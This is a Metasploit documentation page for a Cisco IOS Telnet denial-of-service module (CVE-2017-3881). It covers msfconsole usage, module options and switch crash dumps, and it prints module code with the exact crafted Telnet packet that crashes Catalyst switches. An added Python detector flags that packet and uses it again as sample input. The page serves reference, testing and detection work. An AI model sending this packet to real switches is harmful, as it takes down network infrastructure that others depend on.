Cisco IOS Telnet Denial of Service - Metasploit


This page contains detailed information about how to use the auxiliary/dos/cisco/ios_telnet_rocem Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco IOS Telnet Denial of Service
Module: auxiliary/dos/cisco/ios_telnet_rocem
Source code: modules/auxiliary/dos/cisco/ios_telnet_rocem.rb
Disclosure date: 2017-03-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 23
List of CVEs: CVE-2017-3881

This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/cisco/ios_telnet_rocem
msf auxiliary(ios_telnet_rocem) > show targets
    ... a list of targets ...
msf auxiliary(ios_telnet_rocem) > set TARGET target-id
msf auxiliary(ios_telnet_rocem) > show options
    ... show and set options ...
msf auxiliary(ios_telnet_rocem) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


  1. Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
  2. Enable telnet access and verify that you can reach the switch normally via that mode.

Verification Steps


  1. Start msfconsole
  2. Do: use auxiliary/dos/cisco/ios_telnet_rocem
  3. Do: set RHOST 192.168.1.10
  4. Do: run
  5. The switch should restart and display crash information on the console.

Scenarios


Switch#sh ver
*Mar  1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02C00000
ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
Switch uptime is 1 hour, 28 minutes
System returned to ROM by power-on
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02F00000
[...]
Election Complete
Switch 2 booting as Master
Waiting for Port download...Complete
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Switch Ports Model              SW Version            SW Image
------ ----- -----              ----------            ----------
*    2 52    WS-C3750-48TS      12.2(55)SE10          C3750-IPSERVICESK9-M
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
Switch#
 00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
-Traceback= 41414140
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
Buffered messages:
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:50: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
Queued messages:
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
Instruction Access Exception (0x0400)!
SRR0 = 0x41414140  SRR1 = 0x00029230  SRR2 = 0x00648990  SRR3 = 0x00021200
ESR = 0x00000000  DEAR = 0x00000000  TSR = 0x8C000000  DBSR = 0x00000000
CPU Register Context:
Vector = 0x00000400  PC = 0x41414140  MSR = 0x00029230  CR = 0x53000005
LR = 0x41414141  CTR = 0x0004D860  XER = 0xC0000050
R0 = 0x41414141  R1 = 0x02DDEE80  R2 = 0x00000000  R3 = 0x0358907C
R4 = 0x00000001  R5 = 0xFFFFFFFF  R6 = 0x0182C1B0  R7 = 0x00000000
R8 = 0x00000001  R9 = 0x0290C84C  R10 = 0x00000031  R11 = 0x00000000
R12 = 0x00221C89  R13 = 0x00110000  R14 = 0x00BD7284  R15 = 0x00000000
R16 = 0x00000000  R17 = 0x00000000  R18 = 0x00000000  R19 = 0x00000000
R20 = 0xFFFFFFFF  R21 = 0x00000000  R22 = 0x00000000  R23 = 0x02DDF078
R24 = 0x00000000  R25 = 0x00000001  R26 = 0x000003FB  R27 = 0x00000024
R28 = 0x41414141  R29 = 0x41414141  R30 = 0x41414141  R31 = 0x41414141
Stack trace:
PC = 0x41414140, SP = 0x02DDEE80
Frame 00: SP = 0x41414141    PC = 0x41414141
Switch uptime is 37 minutes, 22 seconds
[... rebooting ... ]
Switch   Ports  Model              SW Version              SW Image
------   -----  -----              ----------              ----------
*    1   52     WS-C3750-48TS      12.2(35)SE5             C3750-IPBASEK9-M
Failed to generate persistent self-signed certificate.
    Secure server will use temporary self-signed certificate.
Press RETURN to get started!
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
Switch>
Switch>as changed to state DOWN
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:32: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
Switch>
Switch>
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140  SRR1 = 0x00029230  SRR2 = 0x00648990  SRR3 = 0x00021200
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000  DEAR = 0x00000000  TSR = 0x8C000000  DBSR = 0x00000000
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400  PC = 0x41414140  MSR = 0x00029230  CR = 0x53000005
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141  CTR = 0x0004D860  XER = 0xC0000050
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141  R1 = 0x02DDEE80  R2 = 0x00000000  R3 = 0x0358907C
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001  R5 = 0xFFFFFFFF  R6 = 0x0182C1B0  R7 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001  R9 = 0x0290C84C  R10 = 0x00000031  R11 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89  R13 = 0x00110000  R14 = 0x00BD7284  R15 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000  R17 = 0x00000000  R18 = 0x00000000  R19 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF  R21 = 0x00000000  R22 = 0x00000000  R23 = 0x02DDF078
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000  R25 = 0x00000001  R26 = 0x000003FB  R27 = 0x00000024
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141  R29 = 0x41414141  R30 = 0x41414141  R31 = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141    PC = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:


Msfconsole Usage


Here is how the dos/cisco/ios_telnet_rocem auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/cisco/ios_telnet_rocem

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show info

       Name: Cisco IOS Telnet Denial of Service
     Module: auxiliary/dos/cisco/ios_telnet_rocem
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-17

Provided by:
  Artem Kondratenko

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   23               yes       The target port (TCP)

Description:
  This module triggers a Denial of Service condition in the Cisco IOS 
  telnet service affecting multiple Cisco switches. Tested against 
  Cisco Catalyst 2960 and 3750.

References:
  http://www.securityfocus.com/bid/96960
  https://nvd.nist.gov/vuln/detail/CVE-2017-3881
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
  https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution

Module Options


This is a complete list of options available in the dos/cisco/ios_telnet_rocem auxiliary module:

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show options

Module options (auxiliary/dos/cisco/ios_telnet_rocem):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   23               yes       The target port (TCP)

Advanced Options


Here is a complete list of advanced options supported by the dos/cisco/ios_telnet_rocem auxiliary module:

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show advanced

Module advanced options (auxiliary/dos/cisco/ios_telnet_rocem):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/cisco/ios_telnet_rocem module can do:

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of evasion options supported by the dos/cisco/ios_telnet_rocem auxiliary module, intended to evade defenses (e.g. antivirus, EDR, firewall, NIDS):

msf6 auxiliary(dos/cisco/ios_telnet_rocem) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Failed to get initial packet from telnet service.


Here is a relevant code snippet related to the "Failed to get initial packet from telnet service." error message:

    begin
      connect
      print_status "Connected to telnet service"
      packet = sock.read(200)
      if packet.nil?
        print_error "Failed to get initial packet from telnet service."
      else
        print_status "Got initial packet from telnet service: " + packet.inspect
      end
      print_status "Sending Telnet DoS packet"
      # IAC SB, option 0x24, CISCO_KITS marker, 1000 bytes of filler, IAC SE
      sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")

Unable to connect to <RHOST>:<RPORT>.


Here is a relevant code snippet related to the "Unable to connect to <RHOST>:<RPORT>." error message:

      end
      print_status "Sending Telnet DoS packet"
      # IAC SB, option 0x24, CISCO_KITS marker, 1000 bytes of filler, IAC SE
      sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
      disconnect
    rescue ::Rex::ConnectionRefused
      print_status "Unable to connect to #{rhost}:#{rport}."
    rescue ::Errno::ECONNRESET
      # the module treats the connection being reset as proof the device went down
      print_good "DoS packet successful. #{rhost} not responding."
    end
  end
end
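The snippets above show the exact shape of the traffic: a Telnet subnegotiation (IAC SB ... IAC SE) for option 0x24 carrying a CISCO_KITS marker and a large filler field. As an added, defender-side example (not code from the Metasploit module or its documentation), the Python below parses every Telnet subnegotiation out of a captured byte stream, unescapes IAC IAC, tolerates a capture cut off before IAC SE, and flags the CMP pattern when a colon-separated field after the marker exceeds a size bound. The 256-byte threshold, the sample byte strings, and the function names are constructed for this demonstration; it generalizes past this one packet to any subnegotiation in the stream.

```python
"""Defender-side check for CVE-2017-3881 CMP telnet traffic (added example).

Not code from the Metasploit module: it parses Telnet subnegotiations
(IAC SB <option> ... IAC SE) out of a captured byte stream and flags the
shape the module sends, option 0x24 with a CISCO_KITS marker followed by
an oversized colon-separated field. Threshold and samples are constructed.
"""
IAC, SB, SE = 0xFF, 0xFA, 0xF0
OPT_NEW_ENVIRON = 0x24        # telnet option 36 (NEW-ENVIRON), reused by Cisco CMP
CMP_MARKER = b"CISCO_KITS"
MAX_SANE_FIELD = 256          # constructed threshold; a real CMP field is far shorter


def parse_subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB ... IAC SE block in stream.

    IAC IAC inside a block is unescaped to a single 0xFF data byte. A block
    that never sees IAC SE is yielded with option -1 (truncated capture).
    """
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd != SB:
            # WILL/WONT/DO/DONT carry one option byte; other commands carry none
            i += 3 if 0xFB <= cmd <= 0xFE else 2
            continue
        if i + 2 >= n:
            break
        option, payload, j, terminated = stream[i + 2], bytearray(), i + 3, False
        while j < n:
            if stream[j] == IAC and j + 1 < n and stream[j + 1] == SE:
                terminated, j = True, j + 2
                break
            if stream[j] == IAC and j + 1 < n and stream[j + 1] == IAC:
                payload.append(IAC)
                j += 2
                continue
            payload.append(stream[j])
            j += 1
        if not terminated:
            yield -1, bytes(payload)
            return
        yield option, bytes(payload)
        i = j


def classify(option: int, payload: bytes) -> str:
    """Verdict for one block: benign, cmp-handshake, cve-2017-3881-pattern or truncated."""
    if option == -1:
        return "truncated"
    if option != OPT_NEW_ENVIRON or CMP_MARKER not in payload:
        return "benign"
    # After the marker the module sends "\x01" "2:" <filler> ":1:"; the
    # oversized filler field is what this check keys on.
    fields = payload.split(CMP_MARKER, 1)[1].split(b":")
    if max(len(f) for f in fields) > MAX_SANE_FIELD:
        return "cve-2017-3881-pattern"
    return "cmp-handshake"


def scan(stream: bytes) -> list:
    """Classify every subnegotiation in a captured stream, in order."""
    return [classify(opt, data) for opt, data in parse_subnegotiations(stream)]


# Constructed samples: a NAWS window-size block (option 31, 80x24), a short
# CMP handshake, the oversized handshake the module sends, and a cut capture.
SAMPLE_NAWS = b"\xff\xfa\x1f\x00\x50\x00\x18\xff\xf0"
SAMPLE_CMP_SHORT = b"\xff\xfa\x24\x00\x03CISCO_KITS\x012:abc:1:\xff\xf0"
SAMPLE_CMP_OVERSIZED = b"\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + b"A" * 1000 + b":1:\xff\xf0"
SAMPLE_TRUNCATED = b"\xff\xfa\x24\x00\x03CISCO"

if __name__ == "__main__":
    for name, s in [("naws", SAMPLE_NAWS), ("cmp-short", SAMPLE_CMP_SHORT),
                    ("cmp-oversized", SAMPLE_CMP_OVERSIZED), ("truncated", SAMPLE_TRUNCATED)]:
        print(f"{name:14s} -> {scan(s)}")
```

Run it directly to see the four verdicts. Keying on the field length rather than on a fixed filler byte matters because the module fills the field with random letters, so a signature on a literal run of "A" would miss it; the crash dumps in the Scenarios section above happen to show 0x41414141 in the registers, but the module as shipped does not guarantee that value. A truncated capture is reported rather than silently ignored so that a sensor sees partial evidence instead of none.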


Authors


  • Artem Kondratenko

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
